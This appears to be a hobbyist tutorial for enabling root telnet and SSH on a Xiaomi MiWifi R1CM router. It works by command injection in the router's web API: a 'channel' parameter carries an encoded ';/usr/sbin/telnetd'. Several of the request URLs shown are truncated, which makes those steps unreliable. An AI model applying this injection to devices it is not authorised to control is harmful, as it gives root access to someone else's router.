Enable ssh and telnet on Xiaomi MiWifi R1CM without registering with Xiaomi
Prerequisite:
Install older xiaomi "development" firmware, such as "miwifi_r1cm_firmware_46a10_2.7.63.bin"
Obtain session login value (STOK value):
- Login to your Xiaomi router with your browser.
- From the URL, you wil find something like this:
http://192.168.31.1/cgi-bin/luci/;stok=ffff999ee999eee9999988888888fffff/web/home#router - The value after "stok=" is the STOK value which is a session token for authentication. (STOK value in the above example is ffff999ee999eee9999988888888fffff )
Enable Telnet:
Replace the red text (YOUR_STOK_VALUE) below with your own stok value. Then copy and paste into your browser. The current password is that you are using to login to Admin page.http://192.168.31.1/cgi-bin/luci/;stok=
ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd
It will output some error code after a while:
{"msg":"未能連線到指定Wi-Fi(Probe timeout)","code":1616} http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE
It will output:
:
{"code":0} Then you should be able to login via Telnet, using username: root and your new password.
Reference: https://wiki.openwrt.org/toh/xiaomi/mini
Enable SSH without registering with Xiaomi
Please replace YOUR_STOK_VALUE in the below URL with your own STOK value and passwords. Then submit each URL via your browser, one by one.
http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE
It will output the below error message but it is normal:
{"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}
http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE
It will output the below error message but it is normal:
{"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}
http://192.168.31.1/cgi-bin/luci/;stok=
It will output the below error message but it is normal:
{"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}
http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqsystem/set_name_password?oldPwd=YOUR_CURRNET_PASSWORD
It will output {"code":0}
Then you should be able to SSH to your router.
login as: root
root@192.168.31.1's password:
BusyBox v1.19.4 (2015-12-03 17:13:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
-----------------------------------------------------
Welcome to XiaoQiang!
-----------------------------------------------------
Reference: https://www.jianshu.com/p/4317234e2175
Upgrade to latest firmware
You can upgrade to latest "development" firmware and the SSH remains enabled.login as: root
root@192.168.31.1's password:
BusyBox v1.19.4 (2017-09-28 19:06:08 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
-----------------------------------------------------
Welcome to XiaoQiang!
-----------------------------------------------------
$$$$$$\ $$$$$$$\ $$$$$$$$\ $$\ $$\ $$$$$$\ $$\ $$\
$$ __$$\ $$ __$$\ $$ _____| $$ | $$ | $$ __$$\ $$ | $$ |
$$ / $$ |$$ | $$ |$$ | $$ | $$ | $$ / $$ |$$ |$$ /
$$$$$$$$ |$$$$$$$ |$$$$$\ $$ | $$ | $$ | $$ |$$$$$ /
$$ __$$ |$$ __$$< $$ __| $$ | $$ | $$ | $$ |$$ $$<
$$ | $$ |$$ | $$ |$$ | $$ | $$ | $$ | $$ |$$ |\$$\
$$ | $$ |$$ | $$ |$$$$$$$$\ $$$$$$$$$ | $$$$$$ |$$ | \$$\
\__| \__|\__| \__|\________| \_________/ \______/ \__| \__|
However, if you upgrade it to "stable" firmware, then the SSH function will be disable.
To solve it, flash the ROM to an old "development" firmware and start over.
Comments